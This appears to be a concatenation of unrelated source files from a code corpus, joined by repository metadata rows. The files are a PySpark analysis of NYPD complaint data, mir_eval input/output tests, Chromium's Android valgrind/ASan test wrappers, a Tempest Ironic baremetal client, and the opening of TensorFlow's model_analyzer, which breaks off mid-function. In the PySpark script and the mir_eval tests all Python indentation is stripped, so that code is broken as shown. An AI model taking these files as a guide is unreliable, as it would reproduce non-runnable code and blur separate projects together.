# to_time_lv = udf(lambda x: datetime.strptime(x.strip(), '%H:%M:%S') if is_time_lv(x) else datetime.strptime('01:01:01', '%H:%M:%S'), DateType())
to_year = udf(lambda x: get_year(x), IntegerType())
to_month = udf(lambda x: get_month(x), IntegerType())
to_day = udf(lambda x: get_day(x), IntegerType())
# read the crime data into a dataframe
df = sqlContext.read.format('com.databricks.spark.csv').options(header=True, inferschema='true', sep=', ').load('NYPD_Complaint_Data_Historic.csv')
df = df.withColumn('CMPLNT_TO_DT', to_date_lv(col('CMPLNT_TO_DT')))
df = df.withColumn('CMPLNT_FR_DT', to_date_lv(col('CMPLNT_FR_DT')))
# df = df.withColumn('CMPLNT_TO_TM', to_time_lv(col('CMPLNT_TO_TM')))
# df = df.withColumn('CMPLNT_FR_TM', to_time_lv(col('CMPLNT_FR_TM')))
df = df.withColumn('RPT_DT', to_date_lv(col('RPT_DT')))
# read the crime data types into the dataframe
typedf = sqlContext.read.format('com.databricks.spark.csv').options(header = False, inferschema='true').load('types.csv')
header = ['id','CMPLNT_NUM','CMPLNT_FR_DT','CMPLNT_FR_TM','CMPLNT_TO_DT',
'CMPLNT_TO_TM','RPT_DT','KY_CD','OFNS_DESC','PD_CD','PD_DESC',
'CRM_ATPT_CPTD_CD','LAW_CAT_CD','JURIS_DESC','BORO_NM',
'ADDR_PCT_CD','LOC_OF_OCCUR_DESC','PREM_TYP_DESC','PARKS_NM',
'HADEVELOPT','X_COORD_CD','Y_COORD_CD','Latitude','Longitude','Lat_Lon']
for i in range(25):
typedf = typedf.withColumnRenamed("C" + str(i), header[i])
# Create sql tables
# sqlContext.registerDataFrameAsTable(df,'crimedata')
sqlContext.registerDataFrameAsTable(typedf,'crimetype')
##############################################################################
# Create new sql dateframe
df_temp = df.withColumn('CMPLNT_YEAR', to_year(col('CMPLNT_FR_DT')))
df_temp = df_temp.withColumn('CMPLNT_MONTH', to_month(col('CMPLNT_FR_DT')))
df_dt = df_temp.withColumn('CMPLNT_DAY', to_day(col('CMPLNT_FR_DT')))
# Create new sql table
sqlContext.registerDataFrameAsTable(df_dt,'crimedt')
###############################
# Time Series Analysis - Year #
###############################
df_year_valid = sqlContext.sql("\
SELECT crimedt.CMPLNT_YEAR, crimedt.KY_CD, count(*) as c \
FROM crimetype \
INNER JOIN crimedt \
ON crimedt.CMPLNT_NUM = crimetype.id \
WHERE crimetype.CMPLNT_FR_DT = 'date' \
AND crimetype.CMPLNT_TO_DT = 'date' \
AND crimedt.CMPLNT_TO_DT >= crimedt.CMPLNT_FR_DT\
GROUP BY crimedt.CMPLNT_YEAR, crimedt.KY_CD\
ORDER BY crimedt.CMPLNT_YEAR, c DESC\
")
lines = df_year_valid.map(lambda x: (x[0], ",".join([ str(z) for z in x[1:] ])))
with open("year_valid.csv", "a") as out_file:
for line in lines.collect():
result = re.findall('\d+', str(line))
print >>out_file, ','.join(result)
################################
# Time Series Analysis - Month #
################################
df_month_valid = sqlContext.sql("\
SELECT crimedt.CMPLNT_MONTH, crimedt.KY_CD, count(*) as c \
FROM crimetype \
INNER JOIN crimedt \
ON crimedt.CMPLNT_NUM = crimetype.id \
WHERE crimetype.CMPLNT_FR_DT = 'date' \
AND crimetype.CMPLNT_TO_DT = 'date' \
AND crimedt.CMPLNT_TO_DT >= crimedt.CMPLNT_FR_DT\
GROUP BY crimedt.CMPLNT_MONTH, crimedt.KY_CD\
ORDER BY crimedt.CMPLNT_MONTH, c DESC\
")
lines = df_month_valid.map(lambda x: (x[0], ",".join([ str(z) for z in x[1:] ])))
with open("month_valid.csv", "a") as out_file:
for line in lines.collect():
result = re.findall('\d+', str(line))
print >>out_file, ','.join(result)
##############################
# Time Series Analysis - Day #
##############################
df_day_valid = sqlContext.sql("\
SELECT crimedt.CMPLNT_DAY, crimedt.KY_CD, count(*) as c \
FROM crimetype \
INNER JOIN crimedt \
ON crimedt.CMPLNT_NUM = crimetype.id \
WHERE crimetype.CMPLNT_FR_DT = 'date' \
AND crimetype.CMPLNT_TO_DT = 'date' \
AND crimedt.CMPLNT_TO_DT >= crimedt.CMPLNT_FR_DT\
GROUP BY crimedt.CMPLNT_DAY, crimedt.KY_CD\
ORDER BY crimedt.CMPLNT_DAY, c DESC\
")
lines = df_day_valid.map(lambda x: (x[0], ",".join([ str(z) for z in x[1:] ])))
with open("day_valid.csv", "a") as out_file:
for line in lines.collect():
result = re.findall('\d+', str(line))
print >>out_file, ','.join(result)
| mit | -4,609,561,843,033,304,600 | 36.681529 | 147 | 0.560176 | false |
faroit/mir_eval | tests/test_input_output.py | 3 | 6414 | """ Unit tests for input/output functions """
import numpy as np
import json
import mir_eval
import warnings
import nose.tools
import tempfile
def test_load_delimited():
# Test for IOError when a non-string or file handle is passed
nose.tools.assert_raises(
IOError, mir_eval.io.load_delimited, None, [int])
# Test for a value error when the wrong number of columns is passed
with tempfile.TemporaryFile('r+') as f:
f.write('10 20')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_delimited, f, [int, int, int])
# Test for a value error on conversion failure
with tempfile.TemporaryFile('r+') as f:
f.write('10 a 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_delimited, f, [int, int, int])
def test_load_events():
# Test for a warning when invalid events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10\n9')
f.seek(0)
events = mir_eval.io.load_events(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'Events should be in increasing order.')
# Make sure events were read in correctly
assert np.all(events == [10, 9])
def test_load_labeled_events():
# Test for a warning when invalid labeled events are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 a\n9 b')
f.seek(0)
events, labels = mir_eval.io.load_labeled_events(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'Events should be in increasing order.')
# Make sure events were read in correctly
assert np.all(events == [10, 9])
# Make sure labels were read in correctly
assert labels == ['a', 'b']
def test_load_intervals():
# Test for a warning when invalid intervals are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 9\n9 10')
f.seek(0)
intervals = mir_eval.io.load_intervals(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'All interval durations must be strictly positive')
# Make sure intervals were read in correctly
assert np.all(intervals == [[10, 9], [9, 10]])
def test_load_labeled_intervals():
# Test for a warning when invalid labeled intervals are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 9 a\n9 10 b')
f.seek(0)
intervals, labels = mir_eval.io.load_labeled_intervals(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'All interval durations must be strictly positive')
# Make sure intervals were read in correctly
assert np.all(intervals == [[10, 9], [9, 10]])
assert labels == ['a', 'b']
def test_load_valued_intervals():
# Test for a warning when invalid valued intervals are supplied
with tempfile.TemporaryFile('r+') as f:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
# Non-increasing is invalid
f.write('10 9 5\n9 10 6')
f.seek(0)
intervals, values = mir_eval.io.load_valued_intervals(f)
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert (str(w[-1].message) ==
'All interval durations must be strictly positive')
# Make sure intervals were read in correctly
assert np.all(intervals == [[10, 9], [9, 10]])
assert np.all(values == [5, 6])
def test_load_ragged_time_series():
# Test for IOError when a non-string or file handle is passed
nose.tools.assert_raises(
IOError, mir_eval.io.load_ragged_time_series, None, float,
header=False)
# Test for a value error on conversion failure
with tempfile.TemporaryFile('r+') as f:
f.write('10 a 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_ragged_time_series, f, float,
header=False)
# Test for a value error on invalid time stamp
with tempfile.TemporaryFile('r+') as f:
f.write('a 10 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_ragged_time_series, f, int,
header=False)
# Test for a value error on invalid time stamp with header
with tempfile.TemporaryFile('r+') as f:
f.write('x y z\na 10 30')
f.seek(0)
nose.tools.assert_raises(
ValueError, mir_eval.io.load_ragged_time_series, f, int,
header=True)
def test_load_tempo():
# Test the tempo loader
tempi, weight = mir_eval.io.load_tempo('data/tempo/ref01.lab')
assert np.allclose(tempi, [60, 120])
assert weight == 0.5
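# Sketch of the reference file format implied by the assertions above: a single
# line holding two tempi and a weight. This is an inference, not mir_eval
# documentation, so treat the exact layout as an assumption.
def _example_tempo_file_format():
    with tempfile.NamedTemporaryFile('w', suffix='.lab', delete=False) as f:
        f.write('60\t120\t0.5')
        fname = f.name
    tempi, weight = mir_eval.io.load_tempo(fname)
    assert np.allclose(tempi, [60, 120])
    assert weight == 0.5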
@nose.tools.raises(ValueError)
def test_load_tempo_multiline():
tempi, weight = mir_eval.io.load_tempo('data/tempo/bad00.lab')
@nose.tools.raises(ValueError)
def test_load_tempo_badweight():
tempi, weight = mir_eval.io.load_tempo('data/tempo/bad01.lab')
def test_load_bad_tempi():
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
tempi, weight = mir_eval.io.load_tempo('data/tempo/bad02.lab')
assert len(w) == 1
assert issubclass(w[-1].category, UserWarning)
assert ('non-negative numbers' in str(w[-1].message))
| mit | -406,221,146,304,703,940 | 36.075145 | 71 | 0.597287 | false |
Omegaphora/external_chromium_org | build/android/pylib/valgrind_tools.py | 32 | 8645 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Classes in this file define additional actions that need to be taken to run a
test under some kind of runtime error detection tool.
The interface is intended to be used as follows.
1. For tests that simply run a native process (i.e. no activity is spawned):
Call tool.CopyFiles().
Prepend test command line with tool.GetTestWrapper().
2. For tests that spawn an activity:
Call tool.CopyFiles().
Call tool.SetupEnvironment().
Run the test as usual.
Call tool.CleanUpEnvironment().
"""
# pylint: disable=R0201
import glob
import logging
import os.path
import subprocess
import sys
from pylib.constants import DIR_SOURCE_ROOT
from pylib.device import device_errors
def SetChromeTimeoutScale(device, scale):
"""Sets the timeout scale in /data/local/tmp/chrome_timeout_scale to scale."""
path = '/data/local/tmp/chrome_timeout_scale'
if not scale or scale == 1.0:
# Delete if scale is None/0.0/1.0 since the default timeout scale is 1.0
device.RunShellCommand('rm %s' % path)
else:
device.WriteFile(path, '%f' % scale, as_root=True)
class BaseTool(object):
"""A tool that does nothing."""
def __init__(self):
"""Does nothing."""
pass
def GetTestWrapper(self):
"""Returns a string that is to be prepended to the test command line."""
return ''
def GetUtilWrapper(self):
"""Returns the wrapper name for the utilities.
Returns:
A string that is to be prepended to the command line of utility
processes (forwarder, etc.).
"""
return ''
def CopyFiles(self):
"""Copies tool-specific files to the device, create directories, etc."""
pass
def SetupEnvironment(self):
"""Sets up the system environment for a test.
This is a good place to set system properties.
"""
pass
def CleanUpEnvironment(self):
"""Cleans up environment."""
pass
def GetTimeoutScale(self):
"""Returns a multiplier that should be applied to timeout values."""
return 1.0
def NeedsDebugInfo(self):
"""Whether this tool requires debug info.
Returns:
True if this tool can not work with stripped binaries.
"""
return False
class AddressSanitizerTool(BaseTool):
"""AddressSanitizer tool."""
WRAPPER_NAME = '/system/bin/asanwrapper'
# Disable memcmp overlap check.There are blobs (gl drivers)
# on some android devices that use memcmp on overlapping regions,
# nothing we can do about that.
EXTRA_OPTIONS = 'strict_memcmp=0,use_sigaltstack=1'
def __init__(self, device):
super(AddressSanitizerTool, self).__init__()
self._device = device
# Configure AndroidCommands to run utils (such as md5sum_bin) under ASan.
# This is required because ASan is a compiler-based tool, and md5sum
# includes instrumented code from base.
device.old_interface.SetUtilWrapper(self.GetUtilWrapper())
libs = glob.glob(os.path.join(DIR_SOURCE_ROOT,
'third_party/llvm-build/Release+Asserts/',
'lib/clang/*/lib/linux/',
'libclang_rt.asan-arm-android.so'))
assert len(libs) == 1
self._lib = libs[0]
def CopyFiles(self):
"""Copies ASan tools to the device."""
subprocess.call([os.path.join(DIR_SOURCE_ROOT,
'tools/android/asan/asan_device_setup.sh'),
'--device', str(self._device),
'--lib', self._lib,
'--extra-options', AddressSanitizerTool.EXTRA_OPTIONS])
self._device.WaitUntilFullyBooted()
def GetTestWrapper(self):
return AddressSanitizerTool.WRAPPER_NAME
def GetUtilWrapper(self):
"""Returns the wrapper for utilities, such as forwarder.
AddressSanitizer wrapper must be added to all instrumented binaries,
including forwarder and the like. This can be removed if such binaries
were built without instrumentation. """
return self.GetTestWrapper()
def SetupEnvironment(self):
try:
self._device.EnableRoot()
except device_errors.CommandFailedError as e:
# Try to set the timeout scale anyway.
# TODO(jbudorick) Handle this exception appropriately after interface
# conversions are finished.
logging.error(str(e))
SetChromeTimeoutScale(self._device, self.GetTimeoutScale())
def CleanUpEnvironment(self):
SetChromeTimeoutScale(self._device, None)
def GetTimeoutScale(self):
# Very slow startup.
return 20.0
class ValgrindTool(BaseTool):
"""Base abstract class for Valgrind tools."""
VG_DIR = '/data/local/tmp/valgrind'
VGLOGS_DIR = '/data/local/tmp/vglogs'
def __init__(self, device):
super(ValgrindTool, self).__init__()
self._device = device
# exactly 31 chars, SystemProperties::PROP_NAME_MAX
self._wrap_properties = ['wrap.com.google.android.apps.ch',
'wrap.org.chromium.native_test']
def CopyFiles(self):
"""Copies Valgrind tools to the device."""
self._device.RunShellCommand(
'rm -r %s; mkdir %s' % (ValgrindTool.VG_DIR, ValgrindTool.VG_DIR))
self._device.RunShellCommand(
'rm -r %s; mkdir %s' % (ValgrindTool.VGLOGS_DIR,
ValgrindTool.VGLOGS_DIR))
files = self.GetFilesForTool()
for f in files:
self._device.PushChangedFiles(
os.path.join(DIR_SOURCE_ROOT, f),
os.path.join(ValgrindTool.VG_DIR, os.path.basename(f)))
def SetupEnvironment(self):
"""Sets up device environment."""
self._device.RunShellCommand('chmod 777 /data/local/tmp')
self._device.RunShellCommand('setenforce 0')
for prop in self._wrap_properties:
self._device.RunShellCommand(
'setprop %s "logwrapper %s"' % (prop, self.GetTestWrapper()))
SetChromeTimeoutScale(self._device, self.GetTimeoutScale())
def CleanUpEnvironment(self):
"""Cleans up device environment."""
for prop in self._wrap_properties:
self._device.RunShellCommand('setprop %s ""' % (prop,))
SetChromeTimeoutScale(self._device, None)
def GetFilesForTool(self):
"""Returns a list of file names for the tool."""
raise NotImplementedError()
def NeedsDebugInfo(self):
"""Whether this tool requires debug info.
Returns:
True if this tool can not work with stripped binaries.
"""
return True
class MemcheckTool(ValgrindTool):
"""Memcheck tool."""
def __init__(self, device):
super(MemcheckTool, self).__init__(device)
def GetFilesForTool(self):
"""Returns a list of file names for the tool."""
return ['tools/valgrind/android/vg-chrome-wrapper.sh',
'tools/valgrind/memcheck/suppressions.txt',
'tools/valgrind/memcheck/suppressions_android.txt']
def GetTestWrapper(self):
"""Returns a string that is to be prepended to the test command line."""
return ValgrindTool.VG_DIR + '/' + 'vg-chrome-wrapper.sh'
def GetTimeoutScale(self):
"""Returns a multiplier that should be applied to timeout values."""
return 30
class TSanTool(ValgrindTool):
"""ThreadSanitizer tool. See http://code.google.com/p/data-race-test ."""
def __init__(self, device):
super(TSanTool, self).__init__(device)
def GetFilesForTool(self):
"""Returns a list of file names for the tool."""
return ['tools/valgrind/android/vg-chrome-wrapper-tsan.sh',
'tools/valgrind/tsan/suppressions.txt',
'tools/valgrind/tsan/suppressions_android.txt',
'tools/valgrind/tsan/ignores.txt']
def GetTestWrapper(self):
"""Returns a string that is to be prepended to the test command line."""
return ValgrindTool.VG_DIR + '/' + 'vg-chrome-wrapper-tsan.sh'
def GetTimeoutScale(self):
"""Returns a multiplier that should be applied to timeout values."""
return 30.0
TOOL_REGISTRY = {
'memcheck': MemcheckTool,
'memcheck-renderer': MemcheckTool,
'tsan': TSanTool,
'tsan-renderer': TSanTool,
'asan': AddressSanitizerTool,
}
def CreateTool(tool_name, device):
"""Creates a tool with the specified tool name.
Args:
tool_name: Name of the tool to create.
device: A DeviceUtils instance.
Returns:
A tool for the specified tool_name.
"""
if not tool_name:
return BaseTool()
ctor = TOOL_REGISTRY.get(tool_name)
if ctor:
return ctor(device)
else:
print 'Unknown tool %s, available tools: %s' % (
tool_name, ', '.join(sorted(TOOL_REGISTRY.keys())))
sys.exit(1)
| bsd-3-clause | 681,379,665,412,633,000 | 30.097122 | 80 | 0.666397 | false |
ebagdasa/tempest | tempest/services/baremetal/v1/base_v1.py | 1 | 12325 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.services.baremetal import base
class BaremetalClientV1(base.BaremetalClient):
"""
Base Tempest REST client for Ironic API v1.
Specific implementations must implement serialize and deserialize
methods in order to send requests to Ironic.
"""
def __init__(self, auth_provider):
super(BaremetalClientV1, self).__init__(auth_provider)
self.version = '1'
self.uri_prefix = 'v%s' % self.version
@base.handle_errors
def list_nodes(self, **kwargs):
"""List all existing nodes."""
return self._list_request('nodes', **kwargs)
@base.handle_errors
def list_chassis(self):
"""List all existing chassis."""
return self._list_request('chassis')
@base.handle_errors
def list_chassis_nodes(self, chassis_uuid):
"""List all nodes associated with a chassis."""
return self._list_request('/chassis/%s/nodes' % chassis_uuid)
@base.handle_errors
def list_ports(self, **kwargs):
"""List all existing ports."""
return self._list_request('ports', **kwargs)
@base.handle_errors
def list_node_ports(self, uuid):
"""List all ports associated with the node."""
return self._list_request('/nodes/%s/ports' % uuid)
@base.handle_errors
def list_nodestates(self, uuid):
"""List all existing states."""
return self._list_request('/nodes/%s/states' % uuid)
@base.handle_errors
def list_ports_detail(self, **kwargs):
"""Details list all existing ports."""
return self._list_request('/ports/detail', **kwargs)
@base.handle_errors
def list_drivers(self):
"""List all existing drivers."""
return self._list_request('drivers')
@base.handle_errors
def show_node(self, uuid):
"""
Gets a specific node.
:param uuid: Unique identifier of the node in UUID format.
:return: Serialized node as a dictionary.
"""
return self._show_request('nodes', uuid)
@base.handle_errors
def show_node_by_instance_uuid(self, instance_uuid):
"""
Gets a node associated with given instance uuid.
:param instance_uuid: Unique identifier of the instance in UUID format.
:return: Serialized node as a dictionary.
"""
uri = '/nodes/detail?instance_uuid=%s' % instance_uuid
return self._show_request('nodes',
uuid=None,
uri=uri)
@base.handle_errors
def show_chassis(self, uuid):
"""
Gets a specific chassis.
:param uuid: Unique identifier of the chassis in UUID format.
:return: Serialized chassis as a dictionary.
"""
return self._show_request('chassis', uuid)
@base.handle_errors
def show_port(self, uuid):
"""
Gets a specific port.
:param uuid: Unique identifier of the port in UUID format.
:return: Serialized port as a dictionary.
"""
return self._show_request('ports', uuid)
@base.handle_errors
def show_port_by_address(self, address):
"""
Gets a specific port by address.
:param address: MAC address of the port.
:return: Serialized port as a dictionary.
"""
uri = '/ports/detail?address=%s' % address
return self._show_request('ports', uuid=None, uri=uri)
def show_driver(self, driver_name):
"""
Gets a specific driver.
:param driver_name: Name of driver.
:return: Serialized driver as a dictionary.
"""
return self._show_request('drivers', driver_name)
@base.handle_errors
def create_node(self, chassis_id, **kwargs):
"""
Create a baremetal node with the specified parameters.
:param cpu_arch: CPU architecture of the node. Default: x86_64.
:param cpu_num: Number of CPUs. Default: 8.
:param storage: Disk size. Default: 1024.
:param memory: Available RAM. Default: 4096.
:param driver: Driver name. Default: "fake"
:return: A tuple with the server response and the created node.
"""
node = {'chassis_uuid': chassis_id,
'properties': {'cpu_arch': kwargs.get('cpu_arch', 'x86_64'),
'cpu_num': kwargs.get('cpu_num', 8),
'storage': kwargs.get('storage', 1024),
'memory': kwargs.get('memory', 4096)},
'driver': kwargs.get('driver', 'fake')}
return self._create_request('nodes', 'node', node)
@base.handle_errors
def create_chassis(self, **kwargs):
"""
Create a chassis with the specified parameters.
:param description: The description of the chassis.
Default: test-chassis
:return: A tuple with the server response and the created chassis.
"""
chassis = {'description': kwargs.get('description', 'test-chassis')}
return self._create_request('chassis', 'chassis', chassis)
@base.handle_errors
def create_port(self, node_id, **kwargs):
"""
Create a port with the specified parameters.
:param node_id: The ID of the node which owns the port.
:param address: MAC address of the port.
:param extra: Meta data of the port. Default: {'foo': 'bar'}.
:param uuid: UUID of the port.
:return: A tuple with the server response and the created port.
"""
port = {'extra': kwargs.get('extra', {'foo': 'bar'}),
'uuid': kwargs['uuid']}
if node_id is not None:
port['node_uuid'] = node_id
if kwargs['address'] is not None:
port['address'] = kwargs['address']
return self._create_request('ports', 'port', port)
@base.handle_errors
def delete_node(self, uuid):
"""
Deletes a node having the specified UUID.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('nodes', uuid)
@base.handle_errors
def delete_chassis(self, uuid):
"""
Deletes a chassis having the specified UUID.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('chassis', uuid)
@base.handle_errors
def delete_port(self, uuid):
"""
Deletes a port having the specified UUID.
:param uuid: The unique identifier of the port.
:return: A tuple with the server response and the response body.
"""
return self._delete_request('ports', uuid)
@base.handle_errors
def update_node(self, uuid, **kwargs):
"""
Update the specified node.
:param uuid: The unique identifier of the node.
:return: A tuple with the server response and the updated node.
"""
node_attributes = ('properties/cpu_arch',
'properties/cpu_num',
'properties/storage',
'properties/memory',
'driver',
'instance_uuid')
patch = self._make_patch(node_attributes, **kwargs)
return self._patch_request('nodes', uuid, patch)
@base.handle_errors
def update_chassis(self, uuid, **kwargs):
"""
Update the specified chassis.
:param uuid: The unique identifier of the chassis.
:return: A tuple with the server response and the updated chassis.
"""
chassis_attributes = ('description',)
patch = self._make_patch(chassis_attributes, **kwargs)
return self._patch_request('chassis', uuid, patch)
@base.handle_errors
def update_port(self, uuid, patch):
"""
Update the specified port.
:param uuid: The unique identifier of the port.
:param patch: List of dicts representing json patches.
:return: A tuple with the server response and the updated port.
"""
return self._patch_request('ports', uuid, patch)
@base.handle_errors
def set_node_power_state(self, node_uuid, state):
"""
Set power state of the specified node.
:param node_uuid: The unique identifier of the node.
:param state: desired state to set (on/off/reboot).
"""
target = {'target': state}
return self._put_request('nodes/%s/states/power' % node_uuid,
target)
@base.handle_errors
def validate_driver_interface(self, node_uuid):
"""
Get all driver interfaces of a specific node.
:param node_uuid: Unique identifier of the node in UUID format.
"""
uri = '{pref}/{res}/{uuid}/{postf}'.format(pref=self.uri_prefix,
res='nodes',
uuid=node_uuid,
postf='validate')
return self._show_request('nodes', node_uuid, uri=uri)
@base.handle_errors
def set_node_boot_device(self, node_uuid, boot_device, persistent=False):
"""
Set the boot device of the specified node.
:param node_uuid: The unique identifier of the node.
:param boot_device: The boot device name.
:param persistent: Boolean value. True if the boot device will
persist to all future boots, False if not.
Default: False.
"""
request = {'boot_device': boot_device, 'persistent': persistent}
resp, body = self._put_request('nodes/%s/management/boot_device' %
node_uuid, request)
self.expected_success(204, resp.status)
return body
@base.handle_errors
def get_node_boot_device(self, node_uuid):
"""
Get the current boot device of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_node_supported_boot_devices(self, node_uuid):
"""
Get the supported boot devices of the specified node.
:param node_uuid: The unique identifier of the node.
"""
path = 'nodes/%s/management/boot_device/supported' % node_uuid
resp, body = self._list_request(path)
self.expected_success(200, resp.status)
return body
@base.handle_errors
def get_console(self, node_uuid):
"""
Get connection information about the console.
:param node_uuid: Unique identifier of the node in UUID format.
"""
resp, body = self._show_request('nodes/states/console', node_uuid)
self.expected_success(200, resp.status)
return resp, body
@base.handle_errors
def set_console_mode(self, node_uuid, enabled):
"""
Start and stop the node console.
:param node_uuid: Unique identifier of the node in UUID format.
:param enabled: Boolean value; whether to enable or disable the
console.
"""
enabled = {'enabled': enabled}
resp, body = self._put_request('nodes/%s/states/console' % node_uuid,
enabled)
self.expected_success(202, resp.status)
return resp, body
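# Illustrative sketch (not part of the original client): one way a test might
# chain the calls above. It assumes `client` is an authenticated
# BaremetalClientV1 and that each create_* call returns (response, body) with
# the body carrying the new resource's 'uuid'; the MAC address and UUID below
# are placeholders.
def _example_enroll_node(client):
    _, chassis = client.create_chassis(description='example-chassis')
    _, node = client.create_node(chassis['uuid'], cpu_num=4, memory=2048)
    _, port = client.create_port(node['uuid'],
                                 address='52:54:00:12:34:56',
                                 uuid='11111111-2222-3333-4444-555555555555')
    return chassis, node, port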
| apache-2.0 | -4,169,565,956,503,638,500 | 31.519789 | 78 | 0.584503 | false |
weapp/miner | publishers/wu_client.py | 1 | 2555 | import urllib, urllib2
import json
class WuClient:
def __init__(self, client_id, client_secret, host="http://localhost:9292", token=None):
self.client_id = client_id
self.client_secret = client_secret
self.host = host
self._build_opener()
self.set_token(token)
self._me = None
def _build_opener(self):
self.opener = urllib2.build_opener()
# opener.addheaders = [('User-agent', 'Mozilla/5.0'),('ACCEPT-ENCODING','gzip;q=1.0,deflate;q=0.6,identity;q=0.3'), ("ACCEPT","*/*")]
def set_token(self, token):
self.token = token
if token:
self.opener.addheaders = [("Authorization", "OAuth %s" % token)]
def auth(self, username, password):
credentials = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"username": username,
"password": password,
"grant_type":"password",
"scope":"read write",
}
# query = urllib.urlencode(credentials)
try:
r = self.open("/oauth/authorize", credentials)
except Exception as e:
print e
return False
self.set_token(r['access_token'])
return True
def open(self, path="/", query=None):
# url = "%s%s" % (self.host, path)
# r = self.opener.open(url, query)
# return json.loads(r.read())
if query:
return self.post(path, query)
else:
return self.get(path)
def get(self, path):
return self._open("GET", path)
def post(self, path, data):
return self._open("POST", path, data)
def put(self, path, data):
return self._open("PUT", path, data)
def _open(self, verb, path, data=None):
# opener = urllib2.build_opener(urllib2.HTTPHandler)
url = "%s%s" % (self.host, path)
if data:
data = urllib.urlencode(data)
request = urllib2.Request(url, data=data)
request.get_method = lambda: verb.upper()
r = self.opener.open(request)
return json.loads(r.read())
def me(self):
if not self._me:
self._me = self.open("/api/me")
return self._me
def user_id(self):
return self.me()["id"]
def new_wu(self, data):
return self.post('/api/wbs', data)
def update_value(self, wu, value):
path = "/api/users/%s/wbs/%s" % (self.user_id(), wu)
return self.put(path, {'data': value})
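# Illustrative usage sketch; the endpoint, client credentials and user
# credentials below are placeholders, not real values.
if __name__ == "__main__":
    client = WuClient("my-client-id", "my-client-secret", host="http://localhost:9292")
    if client.auth("someuser", "somepassword"):
        print(client.me())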
| mit | -4,071,814,758,759,969,000 | 29.058824 | 141 | 0.540117 | false |
zasdfgbnm/tensorflow | tensorflow/python/profiler/model_analyzer.py | 5 | 15000 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model Analyzer.
Analyze model, including shape, params, time, memory, structure, etc.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import six
from google.protobuf import message
from tensorflow.core.profiler import tfprof_options_pb2
from tensorflow.core.profiler import tfprof_output_pb2
from tensorflow.python import pywrap_tensorflow as print_mdl
from tensorflow.python.eager import context
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.profiler import option_builder
from tensorflow.python.profiler import tfprof_logger
from tensorflow.python.util.tf_export import tf_export
_DEFAULT_PROFILE_OPTIONS = 0
_DEFAULT_ADVISE_OPTIONS = 0
# The following options are for 'advise' cmd.
# Show all advice.
ALL_ADVICE = {
'ExpensiveOperationChecker': {},
'AcceleratorUtilizationChecker': {},
'JobChecker': {}, # Only available internally.
'OperationChecker': {},
}
def _graph_string(graph):
"""Helper to serialize a graph to string."""
if graph:
return graph.as_graph_def(add_shapes=True).SerializeToString()
else:
return b''
def _build_options(options):
"""Build tfprof.OptionsProto.
Args:
options: A dictionary of options.
Returns:
tfprof.OptionsProto.
"""
opts = tfprof_options_pb2.OptionsProto()
opts.max_depth = options.get('max_depth', 10)
opts.min_bytes = options.get('min_bytes', 0)
opts.min_peak_bytes = options.get('min_peak_bytes', 0)
opts.min_residual_bytes = options.get('min_residual_bytes', 0)
opts.min_output_bytes = options.get('min_output_bytes', 0)
opts.min_micros = options.get('min_micros', 0)
opts.min_accelerator_micros = options.get('min_accelerator_micros', 0)
opts.min_cpu_micros = options.get('min_cpu_micros', 0)
opts.min_params = options.get('min_params', 0)
opts.min_float_ops = options.get('min_float_ops', 0)
opts.min_occurrence = options.get('min_occurrence', 0)
opts.step = options.get('step', -1)
opts.order_by = options.get('order_by', 'name')
for p in options.get('account_type_regexes', []):
opts.account_type_regexes.append(p)
for p in options.get('start_name_regexes', []):
opts.start_name_regexes.append(p)
for p in options.get('trim_name_regexes', []):
opts.trim_name_regexes.append(p)
for p in options.get('show_name_regexes', []):
opts.show_name_regexes.append(p)
for p in options.get('hide_name_regexes', []):
opts.hide_name_regexes.append(p)
